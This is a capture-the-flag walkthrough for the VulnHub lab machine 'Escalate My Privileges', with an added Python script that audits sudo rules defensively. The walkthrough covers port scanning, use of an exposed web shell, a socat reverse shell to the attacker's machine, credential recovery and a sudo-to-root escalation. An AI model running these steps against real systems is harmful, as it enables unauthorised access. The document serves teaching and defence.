[VLN] Escalate My Privileges

Today we are going to hack the VulnHub machine called Escalate My Privileges: 1. You can download it from the following link: https://www.vulnhub.com/entry/escalate-my-privileges-1,448/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.29
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 11:58 CEST
    Nmap scan report for my_privilege.home (192.168.1.29)
    Host is up (0.00051s latency).
    Not shown: 65526 filtered ports
    PORT      STATE  SERVICE VERSION
    22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
    |   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
    |_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
    80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
    |_http-title: 400 Bad Request
    111/tcp   open   rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4      111/tcp     rpcbind
    |   100000  2,3,4      111/udp     rpcbind
    |   100000  3,4        111/tcp6    rpcbind
    |   100000  3,4        111/udp6    rpcbind
    |   100003  3,4       2049/tcp     nfs
    |   100003  3,4       2049/tcp6    nfs
    |   100003  3,4       2049/udp     nfs
    |   100003  3,4       2049/udp6    nfs
    |   100005  1,2,3    20048/tcp     mountd
    |   100005  1,2,3    20048/tcp6    mountd
    |   100005  1,2,3    20048/udp     mountd
    |   100005  1,2,3    20048/udp6    mountd
    |   100021  1,3,4    35283/tcp6    nlockmgr
    |   100021  1,3,4    45561/tcp     nlockmgr
    |   100021  1,3,4    46989/udp6    nlockmgr
    |   100021  1,3,4    49986/udp     nlockmgr
    |   100024  1        44315/tcp     status
    |   100024  1        49779/udp     status
    |   100024  1        50120/udp6    status
    |   100024  1        56075/tcp6    status
    |   100227  3         2049/tcp     nfs_acl
    |   100227  3         2049/tcp6    nfs_acl
    |   100227  3         2049/udp     nfs_acl
    |_  100227  3         2049/udp6    nfs_acl
    875/tcp   closed unknown
    2049/tcp  open   nfs_acl 3 (RPC #100227)
    20048/tcp open   mountd  1-3 (RPC #100005)
    42955/tcp closed unknown
    46666/tcp closed unknown
    54302/tcp closed unknown
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 149.54 seconds
    If we look at the source code of the initial web page we see: alt="http://ip/phpbash.php"> The robots.txt also mentions phpbash.php, so we browse to: http://192.168.1.29/phpbash.php
  • Exploitation
  • Since we have access to the shell that phpbash.php provides, we will use it to obtain a reverse shell. On our own machine we run:
    nc -nlvp 5555
    In phpbash.php we run:
    socat tcp-connect:192.168.1.148:5555 exec:sh,pty,stderr,setsid,sigint,sane
    And with that we have our reverse shell. Let's take a look at the system.
    sh-4.2$ cd /home
    sh-4.2$ ls
    armour
    sh-4.2$ cd armour
    sh-4.2$ ls
    Credentials.txt  backup.sh  runme.sh
    sh-4.2$ cat Credentials.txt
    my password is md5(rootroot1)
    We see that the user armour has a Credentials.txt telling us how to obtain his password.
    sml@Cassandra:~$ echo -n rootroot1 | md5sum
    b7bc8489abe360486b4b19dbc242e885  -
    We try to log in as armour with the credentials we obtained.
    sh-4.2$ su armour
    su armour
    Password: b7bc8489abe360486b4b19dbc242e885
    [armour@my_privilege ~]$ id
    id
    uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
    We check whether this user can use sudo.
    [armour@my_privilege ~]$ sudo -l
    sudo -l
    Matching Defaults entries for armour on my_privilege:
        requiretty, !visiblepw, always_set_home, env_reset,
        env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS",
        env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
        env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
        env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
        env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
        env_keep+=LD_PRELOAD, secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

    User armour may run the following commands on my_privilege:
        (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash, /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh,
        /usr/bin/fish, /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc, /usr/bin/rssh, /usr/bin/scponly, /bin/scponly,
        /usr/bin/rootsh, /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano, /usr/bin/rnano, /usr/bin/awk,
        /usr/bin/dgawk, /usr/bin/gawk, /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red, /usr/bin/env, /usr/bin/cat,
        /usr/bin/chcon, /usr/bin/chgrp, /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd, /usr/bin/head,
        /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail, /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
        /usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit, /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,
        /usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php, /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,
        /usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed, /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,
        /usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar, /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum,
        /usr/bin/expect, /usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl, /usr/bin/python, /usr/bin/man, /usr/bin/tclsh,
        /usr/bin/script, /usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp, /usr/bin/base64, /usr/bin/busybox,
        /usr/bin/cpan, /usr/bin/cpulimit, /usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg, /usr/sbin/dmsetup,
        /usr/bin/dnf, /usr/bin/docker, /usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand, /usr/bin/facter, /usr/bin/file,
        /usr/bin/finger, /usr/bin/flock, /usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp, /usr/bin/grep, /usr/bin/head,
        /usr/sbin/iftop, /usr/bin/ionice, /usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl, /usr/bin/jq,
        /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace, /usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk, /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip, /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red,
        /usr/bin/rlwrap, /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts, /usr/bin/screen, /usr/bin/sed,
        /usr/sbin/service, /usr/bin/setarch, /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat, /usr/bin/sort,
        /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace, /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,
        /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp, /usr/bin/time, /usr/bin/timeout, /usr/bin/top,
        /usr/bin/ul, /usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget, /usr/bin/xargs, /usr/bin/xxd,
        /script/test.sh, /script/test.py, /sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht, /bin/timedatectl,
        /home/armour/ai, /usr/bin/user_hello
    As we can see there are many (a great many) ways to escalate privileges and practise. In this writeup we will take the easy one :)
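    A sudoers listing this long is exactly the kind of thing a defender should audit automatically rather than by eye. The following Python script is an example added to this writeup (not part of the original post) that parses `sudo -l` style output and flags the two classes of finding visible above: NOPASSWD rules that grant shells, editors or interpreters, and the `env_keep+=LD_PRELOAD` default that lets a user-controlled library load into every sudo'd command. The SAMPLE_SUDO_L text is a constructed, trimmed version of the listing above, and the SHELL_CAPABLE set is a deliberately short illustrative list, not a complete catalogue.

```python
import re

# Constructed sample: a trimmed version of the `sudo -l` output from the writeup.
SAMPLE_SUDO_L = """\
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset,
    env_keep+=LD_PRELOAD, secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/vim, /usr/bin/find,
        /usr/bin/python, /usr/bin/cat, /usr/bin/date
    (root) /usr/sbin/service httpd restart
"""

# Illustrative (assumed) set of binaries that hand over a shell or arbitrary
# code execution when run via sudo; real audits use a much longer catalogue.
SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish",
    "vim", "vi", "nano", "less", "more", "man",
    "find", "awk", "gawk", "perl", "python", "ruby", "env", "socat",
}

# A rule line looks like "(runas) TAG: cmd, cmd, ..."; tags are optional.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return (defaults, rules).

    defaults: the Defaults section joined into one string.
    rules: list of dicts with keys runas, tags (list) and commands (list).
    Indented continuation lines are appended to the preceding rule.
    """
    defaults_lines, rules, section = [], [], None
    for line in text.splitlines():
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if line.startswith("User ") and "may run" in line:
            section = "rules"
            continue
        if not line.strip():
            continue
        if section == "defaults":
            defaults_lines.append(line.strip())
        elif section == "rules":
            m = RULE_RE.match(line)
            if m:
                rules.append({
                    "runas": m.group("runas").strip(),
                    "tags": re.findall(r"[A-Z_]+", m.group("tags")),
                    "commands": m.group("cmds"),
                })
            elif rules:
                rules[-1]["commands"] += " " + line.strip()
    for r in rules:
        r["commands"] = [c.strip() for c in r["commands"].split(",") if c.strip()]
    return " ".join(defaults_lines), rules


def audit(text):
    """Return a list of findings (dicts) describing risky sudo entries."""
    defaults, rules = parse_sudo_l(text)
    findings = []
    if "LD_PRELOAD" in defaults:
        findings.append({"kind": "env_keep",
                         "detail": "LD_PRELOAD is preserved across sudo's env_reset"})
    for r in rules:
        for cmd in r["commands"]:
            # Compare only the basename of the first token (the program itself).
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or name in SHELL_CAPABLE:
                findings.append({"kind": "shell_capable", "command": cmd,
                                 "runas": r["runas"],
                                 "nopasswd": "NOPASSWD" in r["tags"]})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f)
```

    On the sample, the script reports the LD_PRELOAD default plus five NOPASSWD entries (sh, bash, vim, find, python); cat, date and the restricted `service httpd restart` rule are not flagged. The fix on the defending side is the mirror image of the escalation: remove shell-capable binaries from the sudoers grant, drop `LD_PRELOAD` from `env_keep`, and scope each rule to the exact command and arguments the user needs.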
  • Privilege Escalation
  • As easy as...
    [armour@my_privilege ~]$ sudo /bin/bash
    [root@my_privilege armour]# id
    id
    uid=0(root) gid=0(root) groups=0(root)
  • End
  • And with that we are root on the machine :)